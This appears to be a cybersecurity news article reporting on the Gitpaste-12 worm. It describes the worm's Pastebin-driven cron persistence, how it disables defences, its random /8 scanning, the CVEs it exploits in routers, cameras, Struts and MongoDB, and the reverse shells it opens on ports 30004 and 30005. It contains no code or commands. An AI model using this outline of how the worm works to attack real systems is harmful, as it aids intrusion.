Gitpaste-12 Malware via GitHub & Pastebin Attacks Linux Servers and IoT Devices

Recently, cybersecurity researchers have detected a new type of worm targeting Linux-based x86 servers and the Linux internet of things (IoT) devices. This new malware has been named Gitpaste-12, as it uses the GitHub, Pastebin, and other 12 ways that help it to compromise the system.

Juniper Threat Labs detected the first GitPaste-12 attacks on October 15, 2020; that’s why the cybersecurity researchers have reported both the Pastebin URL as well as the git repo. While here, the git repo was consummated on October 30, 2020. 

This new worm can grow in an automatic manner that can begin to lateral spread within an association or to your hosts that are attempting to affect other networks all over the internet. And all this results in poor reliability for your organization.


In this malware, the first stage is related to the initial system that has been compromised. As Gitpaste-12 has 12 different known attack modules and more below development. 

This worm always strive to use known exploits to negotiate the systems, and not only this, but it also attempts to brute force the passwords as well.

Once the malware is done with negotiating, it immediately sets up a cron job that it downloads from Pastebin, and later this job calls the same script and applies it again every minute. By doing this, all the updates regarding the cron job can easily be pushed to the botnet.

The malware starts up its cron job by setting the environment accordingly, which means it begins with stripping the system of its defenses, including firewall rules, SELinux, AppArmor, some common attack prevention, and monitoring software.

Worming Ability

If we talk about the capability, then Gitpaste-12 malware includes a script that generally launches attacks toward other machines; its main motive is to replicate and spread thoroughly. 

However, the Gitpaste-12 malware picks a random /8 CIDR for attack and then attempt all the addresses within that range.

Exploits of Gitpaste-12

Gitpaste-12 has some exploits that have been listed below:-

  • CVE-2017-14135: Webadmin plugin for opendreambox
  • CVE-2020-24217: HiSilicon based IPTV/H.264/H.265 video encoders
  • CVE-2017-5638: Apache Struts
  • CVE-2020-10987: Tenda router
  • CVE-2014-8361: Miniigd SOAP service in Realtek SDK
  • CVE-2020-15893: UPnP in Dlink routers
  • CVE-2013-5948: Asus routers
  • EDB-ID: 48225: Netlink GPON Router
  • EDB-ID: 40500: AVTECH IP Camera
  • CVE-2019-10758: Mongo db
  • CVE-2017-17215: Huawei router

Many cybersecurity researchers have affirmed that worm malware are very annoying and troublesome. The worm malware is filled with several features and abilities; its main ability is to spread in an automated mode that can begin to lateral spread within an institution. 

It can also spread to your hosts that have been trying to affect all other networks that are present on the internet; moreover, this worm provides the threat actors reverse shells. 

And according to the security experts, there are some infected systems that are using TCP ports 30004 and 30005 open to listening for shell commands.

You can follow us on LinkedinTwitterFacebook for daily Cyber Security and hacking news updates.

Also Read: 6 Best Free Malware Analysis Tools to Break Down the Advanced Malware Samples – 2020

Balaji N

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Recent Posts

UEFIcanhazbufferoverflow Flaw In Intel Processors Impacts 100s of PCs & Servers

The Phoenix SecureCore UEFI firmware has discovered a new vulnerability, which runs on several Intel…

16 hours ago

New Linux Variant Of RansomHub Attacking ESXi Systems

Hackers often attack ESXi systems, as they are widely used in enterprise environments to manage…

16 hours ago

Over 50% of US Car Dealers Are Shut Down Following CDK Hack Attack

A cyberattack on CDK Global, a major provider of automotive dealership software solutions, has caused…

18 hours ago

Hackers Published Sensitive Data Stolen From London Hospitals

A cyber-attack on London hospitals resulted in the publication of sensitive data stolen from Synnovis,…

19 hours ago

Hackers Employing FB Infrastructure to Steal Your Account Passwords

Cybercriminals in password theft are constantly developing new ways to deliver phishing emails. They’ve learned…

20 hours ago

CISA Issues New Advisory for Industrial Control Systems

The Cybersecurity and Infrastructure Security Agency (CISA) has released a new advisory concerning a critical…

20 hours ago